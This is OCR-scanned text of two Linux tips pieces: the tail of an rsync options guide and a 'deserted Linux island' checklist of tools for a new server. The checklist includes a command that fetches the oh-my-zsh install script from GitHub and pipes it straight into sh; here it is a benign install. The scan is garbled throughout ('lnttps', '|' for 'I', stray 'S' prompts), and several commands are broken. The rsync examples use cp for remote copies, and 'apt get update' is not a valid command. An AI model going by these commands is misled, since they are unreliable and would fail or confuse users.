alias as well as some additional ones which may come in 
handy some day. 


lnttps://linux.die.net/man/1/rsync 


Bartosz Sadel 
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3.1 Archive mode 


The first and one of the most important options is the 
archive mode enabled by -a (which is in fact a combi- 
nation of a few other flags). This flag enables recursive 
copying as well as preserves most of file attributes like 
owner (only when run as a superuser), group (requires 
superuser if you don’t belong to the group) or permis- 
sions. When copying to remote, by default user/group 
names are used, but you can change that behavior to 
use uid/gid instead. 


3.2 Remote sync 


Synchronization between remote machines is a feature 
which doesn’t require any additional flags. You can 
move files both ways, that is from remote to local and 
vice versa. By default you cannot copy from remote 
to remote but there are ways to achieve this?. Sample 
command transferring to remote: 


$ cp file bsadel@remote:/home/bsadel/ 


Remembering that rsync uses ssh we can leverage its 
config file to use our server aliases and default users. 


Host my—host 
HostName 172.39.14.124 
User bsadel 


Listing 2: ”.ssh/config” 


With such a file you can simply copy it without the 
need to specify the username or any other things like 
non-default ssh key. 


$ cp file my—host:/home/bsadel/ 


3.3. Progress indicator 


rsync supports two ways of showing progress.  Ei- 
ther by file (achieved with --progress) or overall (flag 
--info=progress2). To see it in a more pleasant format 
you can add —h so that numbers are shown in kilobytes 
or megabyte instead of raw bytes. 


3.4 In-place copying 


By default when rsync synchronizes a local file which 
already exists at the final destination it uses an interme- 
diate file. --inplace flag changes that behavior so that 
the file is replaced without creation of any additional 
artifacts. It’s especially useful when synchronizing large 
files /directories. 


4 More 


For more options and examples look at rsync manual 
page or search for articles like this? one by Pradeep Ku- 
mar. Also check out Rsync cheetsheet*. 


*https://backreference.org/2015/02/09/ 
remote-to-remote-data-copy/ 


3nttps://www.linuxtechi.com/rsync-command-examples-linux/ 
P ¥ ip 


4nttps://devhints.io/rsync 
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What to pack for a deserted 
Linux Island -)? 


Things | insist on installing on every new 
Linux server | work on, and you should too 


It’s that time again. You finally manage to ssh into your 
brand-new server, aaaand... 


It sucks. You think to yourself, “ah, if only | had time 
to set this up like | WANT it to be, this machine would’ve 
been a treat”. But alas; you choose to save time by 
chugging on with the basic terminal for hours, which end 
up slowing you down. My point is: Tooling is king. 


Tooling increases productivity, lowers frustration, and 
makes you look cool. & 
pro-duc-tiv:i-ty noun; The effectiveness of 
productive effort, especially in industry, as measured 


in terms of the rate of output per unit of input. 


[i] Tooling is important where you intend to actually work. If 
this is a server you just ssh into to restart a crashed service, 
then this guide might be somewhat irrelevant. 


So, what do | install the moment | log into a new Linux 
machine’, as a starter pack of efficiency? Grab your coffee 
and ssh into your neglected server that wants some love. 


First thing first, update your current software. 
S sudo apt get update 
And get software that gets other software. 


$ sudo apt install curl # (and wget) 
S$ sudo apt install git-all 


Now for the fun and oh so opinionated stuff. These are 
personal (but tried and true) favorite programs and 
configurations. Give them a shot. 


Thttps://www.lexico.com/en/definition/productivity 


? This guide is for Debian-based releases. Make adaptations as 
necessary. 


@ShayNehmad on twitter 
https://github.com/ShayNehmad 


What to pack for a deserted Linux Island? 


The Shell 
| recommend you get the coolest one: 


S$ sudo apt install zsh 


When you launch it for the first time, use the wizard to 
configure it to your liking. If you don’t configure autocomplete and 
chdir without cd, you’re wrong. Then get oh-my-zsh? (for the 
security-minded folks out there - after reviewing the 
script of course). 


$ sh -c "S(curl -fsSL 
https://raw.github.com/robbyrussell/oh-my- 
zsh/master/tools/install.sh)" 


Don’t forget to add 2-letters-long aliases to the most 
frequently used paths (e.g. source, bin and logs). Super 
fast cd-ing jeg. Also, random themes are fun. 


The Terminal(s) 

More terminals == more throughput == more productivity 
== more happiness. That’s just math. Get tmux, oh-my- 
tmux‘’, powerline and nerdfonts. 


S$ sudo apt install tmux 

$ git clone 
https://github.com/gpakosz/.tmux.git 
S$ ln -s -f .tmux/.tmux.conf 

S cp .tmux/.tmux.conf.local 


The Text Editor 

| could write a whole article on why to use vim. In short, 
it’s fast and effective. To improve the experience of using 
vim: get pathogen (vim package manager) and 
nerdtree?® to browse files quickly. Map <C+n> to open 


nerdtree. 


The Browser 

If you need one, get one (I like Chrome). One thing you 
can’t miss is the extension vimium*: it allows you to 
navigate the web using the keyboard alone. 


Thank me later. Now you’ll have the time 
@ShayNehmad on Twitter and GitHub. 


3 https://ohmyz.sh/ 
4 https://github.com/gpakosz/.tmux 


5 https://github.com/scrooloose/nerdtree 
& https://vimium.github.io/ 
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